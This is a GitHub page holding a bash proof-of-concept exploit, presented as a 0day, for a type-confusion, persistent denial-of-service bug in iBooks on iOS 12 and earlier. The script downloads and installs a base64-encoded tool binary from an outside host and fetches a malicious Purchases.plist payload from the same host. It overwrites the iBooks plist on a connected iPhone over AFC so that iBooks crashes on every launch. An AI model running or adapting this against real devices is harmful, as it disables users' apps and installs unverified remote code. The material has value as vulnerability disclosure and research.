-
Notifications
You must be signed in to change notification settings - Fork 12
/
ibooks_09_2018.sh
executable file
·75 lines (66 loc) · 2.79 KB
/
ibooks_09_2018.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env bash
### iBooks iOS 12 type confusion vulnerability / persistant DoS
### Created by Sem Voigtländer on 09/25/2018.
### Licensed under the MIT License
### This is a 0day at this time
### DESCRIPTION
###
### iBooks uses a propertylist for loading the iBooks download files.
### This propertylist is accessible and read/write/delete through the AFC service
### An attacker can corrupt the memory of iBooks by specifying a different type in the Path value of the file.
### iBooks will read this information out at load, thus memory corruption occurs
### Because this read is done upon initialization of iBooks this is persistant after reboots and occurs immediately when opening iBooks.
### The issue can be resolved by moving the plist file to a directory inside a sandboxed bundle container that is not accessible.
# CONSOLE INIT
clear
echo "==== iBooks Type Confusion - iOS <= 12 ===="
echo "= Created by: Sem Voigtlander ===="
echo "==========================================="
echo " "
echo "Please connect your iPhone and wait a few..."
sleep 10
# INITIAL SETUP
echo "Creating exploit tmp directory..."
mkdir -p "/tmp/ibooks_09_2018"
if ! [ -x "$(command -v afcclient)" ]; then
echo "Downloading requirements..."
curl "http://exploitation.cool/plataoplomo/exploits/data/afcclient.bin" > "/tmp/ibooks_09_2018/afcclient.bin"
base64 -D -i "/tmp/ibooks_09_2018/afcclient.bin" -o "/tmp/ibooks_09_2018/afcclient"
rm "/tmp/ibooks_09_2018/afcclient.bin"
chmod +x "/tmp/ibooks_09_2018/afcclient"
mv "/tmp/ibooks_09_2018/afcclient" "/usr/local/bin/afcclient"
fi
# WORKSPACE SETUP
echo "Setting up exploit workspace"
cd "/tmp/ibooks_09_2018"
IBOOKS_DIR="Books"
VULNERABLE_FILE="Purchases/Purchases.plist"
# ARGUMENT HANDLING
if [[ "$1" == "fix" ]]; then
afcclient rm "$IBOOKS_DIR/$VULNERABLE_FILE"
exit;
fi
# PAYLOAD CREATION
echo "Creating payload..."
PAYLOAD="$(curl http://exploitation.cool/plataoplomo/exploits/data/Purchases.plist)";
echo -e "$PAYLOAD" > "Purchases.plist"
# IPHONE BACKUP
echo "Backing up..."
afcclient get "$IBOOKS_DIR/$VULNERABLE_FILE" "Backup.dat"
# EXPLOITATION
echo "Uploading exploit..."
afcclient rm "$IBOOKS_DIR/$VULNERABLE_FILE"
afcclient put "Purchases.plist" "$IBOOKS_DIR/$VULNERABLE_FILE"
rm "Purchases.plist"
# POST_EXPLOITATION
if [ -x "$(command -v idevicedebug)" ]; then
echo -e "Starting iBooks, make sure it is not open.\nIf it says ERROR: LOCKED please unlock your device or manually start iBooks...\n"
sleep 2
idevicedebug -d run com.apple.iBooks
echo -e "\niBooks has exited.\nIf it gave an exception the PoC worked!"
echo "You can restart your device and open iBooks to verify it is persistant."
echo "To fix ibooks simply run this with the following argument: fix"
else
echo "Done, open ibooks!"
fi
rm -rf /tmp/ibooks_09_2018/